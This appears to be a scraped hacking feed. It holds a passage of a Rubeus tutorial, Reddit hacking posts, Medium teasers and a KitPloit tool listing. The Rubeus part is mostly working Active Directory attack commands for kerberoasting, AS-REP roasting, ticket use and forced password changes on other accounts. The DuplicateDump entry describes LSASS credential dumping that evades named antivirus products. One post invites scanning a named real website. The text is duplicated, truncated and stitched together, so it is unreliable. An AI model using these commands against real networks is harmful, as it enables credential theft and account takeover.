Hacking Articles Tips Tricks Videos Tutorials
rvest option rubeus.exe harvest /interval:30 https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhblt2mvrwOxXES3BxOqsSuqsNzpoVnkMvy6FZv_AiR-6Te08TnXZJSeySEwxCZpvgntHTp-C5YsudZjtHT0ly7beAumcqaZ-cO0Hjh9PrYBLHCFABIY2HrG3cs3q_t0wnn5sXlmBLgxFL_UXS…
xe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /rc4opsec
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAwyrDOtkPzh5LZbcfsZJ9FEocNKV-9il9JGWPR_HaTaMnAC5UWRBB_TUM7x88GTadvhrKsKgUVkEK5khHZBWMKQ1ewZJ9A3HLH9aNXMniZmKIaohYFn1ECH99zFXN6t2PjXi0DYUEA0YyS5TXgl5GqsllIxpGfYKs0UGgtdZ1UUphEaPAsz7kBX5eyA/s16000/41.png?w=640&ssl=1
/simple: hashes are output in the console one per line
/nowrap: with this option Kerberos results will not be line wrapped
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /simple /nowrap
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7Ga9vyUX0uTt8hOdko2dAXvg_37pOggHFM-XFDyVJkVPs-bSR2kz_PcYBNydinv6pm_OqXvl8NIr9fj0RhqHUp_SWZg46WHmJqfnbfd2mJJOLTl7V5kK2IMYChbs8gyZ_iakZkma6kgq_RWmONXPI821P8VgveNa_ntvkPkJsvLIf90eQsQR-2c13Nw/s16000/42.png?w=640&ssl=1
/outfile: Can be used to store the hash in an output file
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /outfile:type.hash
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhra04QzY_hGAahQiNOKXRPotFRPSk-XpAa9vFn51feR8w1I6BJEIHKBxZeoFzUnAWuLWV7D_Ubs21aMCtfDMeF6q_im5O4PjQiitD0_OdsuK9vds5BhlBPgo41tNjedqMMfnUu1bmeQpSmrAMoflWYQtC-iSZHdAyDjDdfRv9zOvh9b_2oR6B9aUvOMg/s16000/43.png?w=640&ssl=1 ASREPRoastA service ticket is obtained using TGT and that TGT is obtained by validating a first step called “pre-authentication.” If this pre-authentication requirement is removed for accounts, it makes them vulnerable to asreproasting.
If the user has “Do not use Kerberos pre-authentication” enabled, then an attacker can recover a Kerberos AS-REP encrypted with the users RC4-HMAC’d password and he can attempt to crack this ticket offline.
You can read our detailed article here.
An SPN can be specified with asreproast option like
rubeus.exe asreproast /spn:ldap/dc1.ignite.local/ignite.local
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9YcQHUZ1nFjYCfAWOyN2pEuNCywh46vLpyGSu27NaKLskdKkOOazFAiWt1-hWuxJAPRYd6cPK2vNtFsoUgpEbioFP9L52kef0KDwBupPpn03q3p-md-TYm9mkVngcwiT8UCkSB5GNC7hGjZPdueSiuV_0QnjSvvUVPZ8zPCuvIFXlpQbZNcwn5hQH9g/s16000/44.png?w=640&ssl=1
As you can see, all the accounts with setting “Do not use Kerberos pre-authentication” enabled are vulnerable to the attack and their AS-REP encrypted with RC4-HMAC password has been dumped.
These hashes can also be dumped in a specific hashcat format. By default the hashes can be cracked using JtR.
rubeus.exe asreproast /spn:ldap/dc1.ignite.local/ignite.local /format:hashcat
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuzZFYvdyjmSuLCVCFSeE0DzQsWRGWst6-07B3fM6OhJC_ynL1SYUnjeuDiK2_21T0CBR85qRc-Vk_kuLZCiRNjxNihNPRkXtFxPl4zYemQ0feJDhib8zhRjFMCQkSyuOIB4OkGbeaj3EaYUp9qKiVkH_3lWK093sxHMtpZUh6sCfcWuoyCDR_1y6EXw/s16000/45.png?w=640&ssl=1
/domain and /dc are optional flags that can be used to explicitly define the domain and controller accounts.
rubeus.exe asreproast /domain:ignite.local /dc:dc1
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU5K76cQsIuSu9GrxN3vgUKqkJUU___OkYGcPdp7Hd7u2JxvSeRWBE-OF0jLxWzqHLe-KOaKtnWxtRg6CZGH0J9Lm52J6vtH-m-8NyBH3WS-4_qyshTvp-mHPSaBQIyB81lg7tr4uXN4qEN3AEoSx531T9Voco3yD_U4tmfLQEUtMlbULzoA8_dQ4dmg/s16000/46.png?w=640&ssl=1
/outfile can be used to save this hash in an output file.
rubeus.exe asreproast /spn:ldap/dc1.ignite.local/ignite.local /outfile:type2.hash
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmwIPnXN2_pehKSFN13XmPFM9Qs5lG1rPdC6QwVHaYi-1eadfLXXxvfyxx9cfgqu2Vo-Pq-tdWFdCN0Um04hqWsebRFGOU8P_coOeU5SUlgRVjZQe2uJHepN3GxCxqtwjzdSsdQdkvlggWxWFB2lhCB8KgleuEiPNiLCz5NJ4w76KtI_1rBotxC8Qww/s16000/47.png?w=640&ssl=1
If /ldaps is used, LDAP query shall go over secured LDAP (port 636)
rubeus.exe asreproast /user:harshitrajpal /ldaps
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicLWjJ9T54E7EuA6kTlhxQM8rPoFBs5IFXBrln66dSaa40ah7Vzqlnfi1aFoylz4BwNSMl9jmuOcN-wO5HSLrKw-_ktEzrbY5-7BY-Im5AwHrAgJLLeszFR5pAXhmy[...]
___________________________
@hacking_Attack
@Hacking_Video
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAwyrDOtkPzh5LZbcfsZJ9FEocNKV-9il9JGWPR_HaTaMnAC5UWRBB_TUM7x88GTadvhrKsKgUVkEK5khHZBWMKQ1ewZJ9A3HLH9aNXMniZmKIaohYFn1ECH99zFXN6t2PjXi0DYUEA0YyS5TXgl5GqsllIxpGfYKs0UGgtdZ1UUphEaPAsz7kBX5eyA/s16000/41.png?w=640&ssl=1
/simple: hashes are output in the console one per line
/nowrap: with this option Kerberos results will not be line wrapped
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /simple /nowrap
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7Ga9vyUX0uTt8hOdko2dAXvg_37pOggHFM-XFDyVJkVPs-bSR2kz_PcYBNydinv6pm_OqXvl8NIr9fj0RhqHUp_SWZg46WHmJqfnbfd2mJJOLTl7V5kK2IMYChbs8gyZ_iakZkma6kgq_RWmONXPI821P8VgveNa_ntvkPkJsvLIf90eQsQR-2c13Nw/s16000/42.png?w=640&ssl=1
/outfile: Can be used to store the hash in an output file
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /outfile:type.hash
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhra04QzY_hGAahQiNOKXRPotFRPSk-XpAa9vFn51feR8w1I6BJEIHKBxZeoFzUnAWuLWV7D_Ubs21aMCtfDMeF6q_im5O4PjQiitD0_OdsuK9vds5BhlBPgo41tNjedqMMfnUu1bmeQpSmrAMoflWYQtC-iSZHdAyDjDdfRv9zOvh9b_2oR6B9aUvOMg/s16000/43.png?w=640&ssl=1 ASREPRoastA service ticket is obtained using TGT and that TGT is obtained by validating a first step called “pre-authentication.” If this pre-authentication requirement is removed for accounts, it makes them vulnerable to asreproasting.
If the user has “Do not use Kerberos pre-authentication” enabled, then an attacker can recover a Kerberos AS-REP encrypted with the users RC4-HMAC’d password and he can attempt to crack this ticket offline.
You can read our detailed article here.
An SPN can be specified with asreproast option like
rubeus.exe asreproast /spn:ldap/dc1.ignite.local/ignite.local
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9YcQHUZ1nFjYCfAWOyN2pEuNCywh46vLpyGSu27NaKLskdKkOOazFAiWt1-hWuxJAPRYd6cPK2vNtFsoUgpEbioFP9L52kef0KDwBupPpn03q3p-md-TYm9mkVngcwiT8UCkSB5GNC7hGjZPdueSiuV_0QnjSvvUVPZ8zPCuvIFXlpQbZNcwn5hQH9g/s16000/44.png?w=640&ssl=1
As you can see, all the accounts with setting “Do not use Kerberos pre-authentication” enabled are vulnerable to the attack and their AS-REP encrypted with RC4-HMAC password has been dumped.
These hashes can also be dumped in a specific hashcat format. By default the hashes can be cracked using JtR.
rubeus.exe asreproast /spn:ldap/dc1.ignite.local/ignite.local /format:hashcat
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuzZFYvdyjmSuLCVCFSeE0DzQsWRGWst6-07B3fM6OhJC_ynL1SYUnjeuDiK2_21T0CBR85qRc-Vk_kuLZCiRNjxNihNPRkXtFxPl4zYemQ0feJDhib8zhRjFMCQkSyuOIB4OkGbeaj3EaYUp9qKiVkH_3lWK093sxHMtpZUh6sCfcWuoyCDR_1y6EXw/s16000/45.png?w=640&ssl=1
/domain and /dc are optional flags that can be used to explicitly define the domain and controller accounts.
rubeus.exe asreproast /domain:ignite.local /dc:dc1
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU5K76cQsIuSu9GrxN3vgUKqkJUU___OkYGcPdp7Hd7u2JxvSeRWBE-OF0jLxWzqHLe-KOaKtnWxtRg6CZGH0J9Lm52J6vtH-m-8NyBH3WS-4_qyshTvp-mHPSaBQIyB81lg7tr4uXN4qEN3AEoSx531T9Voco3yD_U4tmfLQEUtMlbULzoA8_dQ4dmg/s16000/46.png?w=640&ssl=1
/outfile can be used to save this hash in an output file.
rubeus.exe asreproast /spn:ldap/dc1.ignite.local/ignite.local /outfile:type2.hash
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmwIPnXN2_pehKSFN13XmPFM9Qs5lG1rPdC6QwVHaYi-1eadfLXXxvfyxx9cfgqu2Vo-Pq-tdWFdCN0Um04hqWsebRFGOU8P_coOeU5SUlgRVjZQe2uJHepN3GxCxqtwjzdSsdQdkvlggWxWFB2lhCB8KgleuEiPNiLCz5NJ4w76KtI_1rBotxC8Qww/s16000/47.png?w=640&ssl=1
If /ldaps is used, LDAP query shall go over secured LDAP (port 636)
rubeus.exe asreproast /user:harshitrajpal /ldaps
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicLWjJ9T54E7EuA6kTlhxQM8rPoFBs5IFXBrln66dSaa40ah7Vzqlnfi1aFoylz4BwNSMl9jmuOcN-wO5HSLrKw-_ktEzrbY5-7BY-Im5AwHrAgJLLeszFR5pAXhmy[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
xe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /rc4opsec https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAwyrDOtkPzh5LZbcfsZJ9FEocNKV-9il9JGWPR_HaTaMnAC5UWRBB_TUM7x88GTadvhrKsKgUVkEK5khHZBWMKQ1ewZJ9A3HLH9aNXMniZmKIaohYFn1ECH9…
iVE9VRRlj-eY1TjNlryOK7HvNXGWT6mDotM_eltYvtqjZCvFMpiMLwTcqQcTTA/s16000/48.png?w=640&ssl=1 CreatenetonlyThe option createnetonly uses the CreateProcessWithLogonW() API to create a new hidden process while returning the ID and LUID. This LUID can then be used with ptt option to apply this ticket in the newly created process. This prevents erasing of current tickets.
/ticket flag can be used to provide kirbi ticket of base64 blob with the created process.
rubeus.exe createnetonly /program:"C:\Windows\System32\upnpcont.exe" /ticket:ticket.kirbi
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3FKa6ls_-29lSqgyft6xtWHX1Ej2Oj3qNBd6gcRL6ZWHAWHGJUU87S1-kwukPM_ENXC8w6gmapxAM25l75AJwJY3gMds-L0JwtbHNZhwseCLcOFtBWNfn5FCSLZibEsX8UbPoBmaGqCcHmlpEDl9FgtoTlk2DAKM5Fon6Y3tyJXUS11HHTFFjlhqGhA/s16000/49.png?w=640&ssl=1
As you can see, the process ID 3032 is associated with this hidden process and LUID given which can be used using the /luid flag. ChangepwThe Rubeus changepw option allows an attacker to change a user’s plaintext password from a TGT .kirbi file or a base64 blob. Hence, when used in conjunction with tgtdeleg or asktgt, we can change a user’s password just from it’s hash. For example, let’s set current user’s password to “Password@1!!!”
/ticket: we provided valid TGT of current user.
rubeus.exe changepw /ticket:doIFNDCC...bA== /new:Password@1!!!
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHCPfcjKZuep_bsOMeMHhXWd8kT7ZeDlaXlBGHjRflEVXmRtBZPU0BD_RLJGcecu3rcR_zQ1kw_LNpYltwob_GdcoAZeuXP-vYV0KHwWe5r0snAonRtIbyIB2v689p97fe3211gyxUB8E1VyC-x8jQqDXbHNewLva59ZCzgRiOpnj2s0xUi4NBwUiWmw/s16000/50.png?w=640&ssl=1
As you can see, password for user ‘harshitrajpal’ has been changed successfully.
Now, we can choose a specific user which has the same password using the /targetuser option too (can be found out using the brute method). Note that necessary privileges may be required here.
rubeus.exe changepw /targetuser:ignite.local\mufasa /ticket:doIFNDCC...bA== /new:Password@1!!!
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaRfmzU-7AOrIeF7uWsr7UsnmMxx_MyAt2GwbvBN_bGLMQlwMB4nDeuim8TmvtdLXbxqpNe41akjFa4MJBVtU6rHxNJ1X2Ux01bpt9eFg2PVE2AcV7gE9AiLsJ1Y3rB-bF_2h-hFiqJxL5UsgOOSwrkzFJq3QDKVuhrNef1KlV-76kN1i-TfDVFjt5lw/s16000/51.png?w=640&ssl=1
As you can see, Mufasa had the same password as harshitrajpal and his password got changed. CurrentluidA simple option to display current LUID. LUID can be utilised with other options by specifying with the /luid flag. For example, to purge ticket of a specific user, luid may be needed.
rubeus.exe currentluid
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYNYxL8Nxhbmw4Sh8RLN9ioPlyAzGrNhjKkXlIjKo4mGLgCoV1gjdSA02lXPKTsipsVp2armNhdtsUKpZjXh2OPzVwagCLoBux_Z5XXH4WAGLEJLuIPxPqIewbx877l-XMItna27k892C5VKxSuolCUoYLb_HlwJjYRbR14kXhyRhrbrItpQaPX4GPSA/s16000/52.png?w=640&ssl=1 ConclusionThe article talked about a C# implementation of various popular AD attacks covered in variety of major projects like Kekeo called “Rubeus.” It is a versatile tool which can be dropped on the victim’s machine and be used to perform various AD related attacks. We tried to cover a majority of options. A detailed wiki can be referred to here. The article is intended to serve as a quick ready reference for Rubeus usage. Hope you liked the article. Thanks for reading.
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here
The post A Detailed Guide on Rubeus appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
/ticket flag can be used to provide kirbi ticket of base64 blob with the created process.
rubeus.exe createnetonly /program:"C:\Windows\System32\upnpcont.exe" /ticket:ticket.kirbi
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3FKa6ls_-29lSqgyft6xtWHX1Ej2Oj3qNBd6gcRL6ZWHAWHGJUU87S1-kwukPM_ENXC8w6gmapxAM25l75AJwJY3gMds-L0JwtbHNZhwseCLcOFtBWNfn5FCSLZibEsX8UbPoBmaGqCcHmlpEDl9FgtoTlk2DAKM5Fon6Y3tyJXUS11HHTFFjlhqGhA/s16000/49.png?w=640&ssl=1
As you can see, the process ID 3032 is associated with this hidden process and LUID given which can be used using the /luid flag. ChangepwThe Rubeus changepw option allows an attacker to change a user’s plaintext password from a TGT .kirbi file or a base64 blob. Hence, when used in conjunction with tgtdeleg or asktgt, we can change a user’s password just from it’s hash. For example, let’s set current user’s password to “Password@1!!!”
/ticket: we provided valid TGT of current user.
rubeus.exe changepw /ticket:doIFNDCC...bA== /new:Password@1!!!
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHCPfcjKZuep_bsOMeMHhXWd8kT7ZeDlaXlBGHjRflEVXmRtBZPU0BD_RLJGcecu3rcR_zQ1kw_LNpYltwob_GdcoAZeuXP-vYV0KHwWe5r0snAonRtIbyIB2v689p97fe3211gyxUB8E1VyC-x8jQqDXbHNewLva59ZCzgRiOpnj2s0xUi4NBwUiWmw/s16000/50.png?w=640&ssl=1
As you can see, password for user ‘harshitrajpal’ has been changed successfully.
Now, we can choose a specific user which has the same password using the /targetuser option too (can be found out using the brute method). Note that necessary privileges may be required here.
rubeus.exe changepw /targetuser:ignite.local\mufasa /ticket:doIFNDCC...bA== /new:Password@1!!!
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaRfmzU-7AOrIeF7uWsr7UsnmMxx_MyAt2GwbvBN_bGLMQlwMB4nDeuim8TmvtdLXbxqpNe41akjFa4MJBVtU6rHxNJ1X2Ux01bpt9eFg2PVE2AcV7gE9AiLsJ1Y3rB-bF_2h-hFiqJxL5UsgOOSwrkzFJq3QDKVuhrNef1KlV-76kN1i-TfDVFjt5lw/s16000/51.png?w=640&ssl=1
As you can see, Mufasa had the same password as harshitrajpal and his password got changed. CurrentluidA simple option to display current LUID. LUID can be utilised with other options by specifying with the /luid flag. For example, to purge ticket of a specific user, luid may be needed.
rubeus.exe currentluid
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYNYxL8Nxhbmw4Sh8RLN9ioPlyAzGrNhjKkXlIjKo4mGLgCoV1gjdSA02lXPKTsipsVp2armNhdtsUKpZjXh2OPzVwagCLoBux_Z5XXH4WAGLEJLuIPxPqIewbx877l-XMItna27k892C5VKxSuolCUoYLb_HlwJjYRbR14kXhyRhrbrItpQaPX4GPSA/s16000/52.png?w=640&ssl=1 ConclusionThe article talked about a C# implementation of various popular AD attacks covered in variety of major projects like Kekeo called “Rubeus.” It is a versatile tool which can be dropped on the victim’s machine and be used to perform various AD related attacks. We tried to cover a majority of options. A detailed wiki can be referred to here. The article is intended to serve as a quick ready reference for Rubeus usage. Hope you liked the article. Thanks for reading.
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here
The post A Detailed Guide on Rubeus appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
120k Email Credential Leaks | Plain Passwords
https://cdn-images-1.medium.com/max/610/1*nFUQbfvZmLFuClKn7MZc9g.png
It’s been a while since my last article publish here in medium. but in this article that I'm going to share with you is related to a Email…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
120k Email Credential Leaks | Plain Passwords
https://cdn-images-1.medium.com/max/610/1*nFUQbfvZmLFuClKn7MZc9g.png
It’s been a while since my last article publish here in medium. but in this article that I'm going to share with you is related to a Email…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
120k Email Credential Leaks | Plain Passwords
It’s been a while since my last article publish here in medium. but in this article that I'm going to share with you is related to a Email…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Should you Sell your old Hard Drives?
https://cdn-images-1.medium.com/max/2600/1*rPZOOglyIveCHQlGAcHoLA.jpeg
A quick or full format will only remove the file table, which is essentially an index that links the file names with the actual data…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Should you Sell your old Hard Drives?
https://cdn-images-1.medium.com/max/2600/1*rPZOOglyIveCHQlGAcHoLA.jpeg
A quick or full format will only remove the file table, which is essentially an index that links the file names with the actual data…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Should you Sell your old Hard Drives?
A quick or full format will only remove the file table, which is essentially an index that links the file names with the actual data blocks…
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Smishing - How to Recognize Dangerous Text Messages
https://external-preview.redd.it/bDYcEy44V42IEAveWpRWLD6R72Mssf-LlSyM8t3OvRY.jpg?width=640&crop=smart&auto=webp&s=f63a947d4319e84c83ef4dea93242cadb1d1e70b submitted by /u/DrinkMoreCodeMore
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Smishing - How to Recognize Dangerous Text Messages
https://external-preview.redd.it/bDYcEy44V42IEAveWpRWLD6R72Mssf-LlSyM8t3OvRY.jpg?width=640&crop=smart&auto=webp&s=f63a947d4319e84c83ef4dea93242cadb1d1e70b submitted by /u/DrinkMoreCodeMore
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Smishing - How to Recognize Dangerous Text Messages
Posted in r/hacking by u/DrinkMoreCodeMore • 1 point and 0 comments
hacking: security in practice
How often do you encounter services using non-default port numbers?
I know anything can run on any port, but I haven’t yet seen anything other than the default setup. Is it common to see systems setup using non-standard ports? I’ve heard that this can mess with things like nmap’s estimated services
submitted by /u/Agent-BTZ
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How often do you encounter services using non-default port numbers?
I know anything can run on any port, but I haven’t yet seen anything other than the default setup. Is it common to see systems setup using non-standard ports? I’ve heard that this can mess with things like nmap’s estimated services
submitted by /u/Agent-BTZ
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How often do you encounter services using non-default port numbers?
I know anything can run on any port, but I haven’t yet seen anything other than the default setup. Is it common to see systems setup using...
hacking: security in practice
I don't think this is much of a hacking but the internet is going to shutdown in my country and I don't know how to cross internet blockage.
I live in Iran and our government probably will block all access to global internet to censor our protests. we stiil will have access to national nthernet but that's not good. is there a way for me to cross this blockage?
submitted by /u/ario3831
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
I don't think this is much of a hacking but the internet is going to shutdown in my country and I don't know how to cross internet blockage.
I live in Iran and our government probably will block all access to global internet to censor our protests. we stiil will have access to national nthernet but that's not good. is there a way for me to cross this blockage?
submitted by /u/ario3831
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
I don't think this is much of a hacking but the internet is going...
I live in Iran and our government probably will block all access to global internet to censor our protests. we stiil will have access to national...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
signal bots on telegram
hey there,
anyone has some content to study about signal bots on telegram?
i'm interesting in bots that send me a signal to help analisys of cassino's games (have not familiarity of this term in english, sorry).
Link below to demonstrate what i'm talk about:
https://www.youtube.com/watch?v=PrqUefbnEZc
submitted by /u/dogras420
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
signal bots on telegram
hey there,
anyone has some content to study about signal bots on telegram?
i'm interesting in bots that send me a signal to help analisys of cassino's games (have not familiarity of this term in english, sorry).
Link below to demonstrate what i'm talk about:
https://www.youtube.com/watch?v=PrqUefbnEZc
submitted by /u/dogras420
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
signal bots on telegram
hey there, anyone has some content to study about signal bots on telegram? i'm interesting in bots that send me a signal to help analisys of...
hacking: security in practice
Is it possible to hack into someone's phone just by a simple phone call, and you have nothing else, just their phone number?
I literally know nothing about hacking, I'm just curious.
submitted by /u/PratikBrahma101
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Is it possible to hack into someone's phone just by a simple phone call, and you have nothing else, just their phone number?
I literally know nothing about hacking, I'm just curious.
submitted by /u/PratikBrahma101
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Is it possible to hack into someone's phone just by a simple phone...
I literally know nothing about hacking, I'm just curious.
hacking: security in practice
How easy is it for a crazy ex to get my pass
I need opinions on this because I’m not too familiar with this stuff. Back in September texts were sent to my boyfriend over tiktok DM, posing as me and asking him for his snap password because my snapchat was “messed up” - AKA trying to log into his snap. The texts sent were very very realistic and the conversation was muted so I never saw it. Earlier today I was going through my DM’s for whatever reason and saw the texts. I told my boyfriend about it and he was like “oh yeah that was weird I knew it was a hacker because you were texting me on snapchat at the time” (guess he forgot to tell me or something). Since I just saw this now and never changed my password, the person has had access to my account this whole time but hasn’t done anything else. They only messaged my boyfriend - which is weird because I had other DM’s and I’m not sure how they knew we were together because we hadn’t posted together. He has a crazy ex but I didn’t think she would be that crazy. Would a random hacker do this? I’m just really worried it’s someone personal. No other social media was hacked
submitted by /u/orangeslice5151
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How easy is it for a crazy ex to get my pass
I need opinions on this because I’m not too familiar with this stuff. Back in September texts were sent to my boyfriend over tiktok DM, posing as me and asking him for his snap password because my snapchat was “messed up” - AKA trying to log into his snap. The texts sent were very very realistic and the conversation was muted so I never saw it. Earlier today I was going through my DM’s for whatever reason and saw the texts. I told my boyfriend about it and he was like “oh yeah that was weird I knew it was a hacker because you were texting me on snapchat at the time” (guess he forgot to tell me or something). Since I just saw this now and never changed my password, the person has had access to my account this whole time but hasn’t done anything else. They only messaged my boyfriend - which is weird because I had other DM’s and I’m not sure how they knew we were together because we hadn’t posted together. He has a crazy ex but I didn’t think she would be that crazy. Would a random hacker do this? I’m just really worried it’s someone personal. No other social media was hacked
submitted by /u/orangeslice5151
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How easy is it for a crazy ex to get my pass
I need opinions on this because I’m not too familiar with this stuff. Back in September texts were sent to my boyfriend over tiktok DM, posing as...
hacking: security in practice
Possible CORS or cache poisoning vulnerablity
I recently started with bug bounty and scanned a target with burp. The scan sais that the page might be vulnerable to cache poisoning. Unfortunatly i'm not experienced enough to test if the page is vulnerable or not.
Feel free to scan the page yourself and find out if it's vulnerable or not. If you do find that the page is vulnerable and decide to make a report, I would appreciate some credit but obviously you don't have to since i've contributed verly little.
webpage: https://api.20min.ch
submitted by /u/Remote_Inspection_68
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Possible CORS or cache poisoning vulnerablity
I recently started with bug bounty and scanned a target with burp. The scan sais that the page might be vulnerable to cache poisoning. Unfortunatly i'm not experienced enough to test if the page is vulnerable or not.
Feel free to scan the page yourself and find out if it's vulnerable or not. If you do find that the page is vulnerable and decide to make a report, I would appreciate some credit but obviously you don't have to since i've contributed verly little.
webpage: https://api.20min.ch
submitted by /u/Remote_Inspection_68
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Possible CORS or cache poisoning vulnerablity
I recently started with bug bounty and scanned a target with burp. The scan sais that the page might be vulnerable to cache poisoning. ...
hacking: security in practice
Securely erase iPhone data?
I've learned that data is not permanently deleted until it has been overwritten which iPhone's reset function doesn't do. Any software recommendations to overwrite/erase iPhone data?
submitted by /u/Wild-Treat-1562
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Securely erase iPhone data?
I've learned that data is not permanently deleted until it has been overwritten which iPhone's reset function doesn't do. Any software recommendations to overwrite/erase iPhone data?
submitted by /u/Wild-Treat-1562
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Securely erase iPhone data?
I've learned that data is not permanently deleted until it has been overwritten which iPhone's reset function doesn't do. Any software...
hacking: security in practice
Does anyone know how to export audio assets from Unreal Engine 4?
Basically the title says it, I need to pull audio assets from poppy playtime and I can’t seem to find a way export the assets without getting a error. I’m asking here because there is not way that I have found to decompile the .pak and pull audio out. Anyone have any pointers.
submitted by /u/JunkBoi76
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Does anyone know how to export audio assets from Unreal Engine 4?
Basically the title says it, I need to pull audio assets from poppy playtime and I can’t seem to find a way export the assets without getting a error. I’m asking here because there is not way that I have found to decompile the .pak and pull audio out. Anyone have any pointers.
submitted by /u/JunkBoi76
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Does anyone know how to export audio assets from Unreal Engine 4?
Basically the title says it, I need to pull audio assets from poppy playtime and I can’t seem to find a way export the assets without getting a...
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
DuplicateDump - Dumping LSASS With A Duplicated Handle From Custom LSA Plugin
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie3nSfB41hs0CJGekmcb_wnpRoyhp1ZHAOGgCMkl7f44Gg9JllQnzCCHRC2bn6N2ndJ0eAdm47ant28xRy3nL-RHvo7XYGz9XPEtcQq4HdfXdHEfzl_cSvmOoXcNhBbQ-Q28we1wxk3sgaCV3rXZyXUKG4RHTaMZbDrvGqbXJ3L1SWmCqQvdzVK56I/w640-h314/LSAPlugin.png
DuplicateDump is a fork of MirrorDump with following modifications:
* DInovke implementation
* LSA plugin DLL written in C++ which could be clean up after dumping LSASS. MirrorDump compile LSA plugin as .NET assembly which would not be unloaded by LSASS process. That's why MirrorDump failed to delete the plugin.
* PID of dump process (i.e., DuplicateDump) is shared to LSA plugin through named pipe
* Passing value "0" instead of LSASS PID to MiniDumpWriteDump. This prevent MiniDumpWriteDump from opening its own handle to LSASS
DuplicateDump add custom LSA plugin that duplicate LSASS process handle from the LSASS process to DuplicateDump. So DuplicateDump has a ready to use process handle to LSASS without invoking OpenProcess.
Testing
By loading DuplicateDump in memory, it was able to dump LSASS memory without detection on
* Symantec 14.3
* Kaspersky Enterprise
* Windows Defender
Detected by Cortex XDR, Crowdstrike. Failed to dump lsass without detection on SentinalOne.
Usage
Compile LSA plugin (export either SpLsaModeInitialize or dllMain function) and provide the full path of DLL to DuplicateDump
Example
Improvement
*
DuplicateDump use DInvoke to call API AddSecurityPackage to load a LSA plugin. You could use RPC call without having to invoke that API call directly. Check details in XPN's blog post
*
Recently, splinter_code discovered that SecLogon could be leveraged to dump LSASS. Strongly recommend you to study his blog post.
References
* https://github.com/CCob/MirrorDump
* https://rastamouse.me/dumping-lsass-with-duplicated-handles/
* https://github.com/jfmaes/SharpHandler
Download DuplicateDump
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
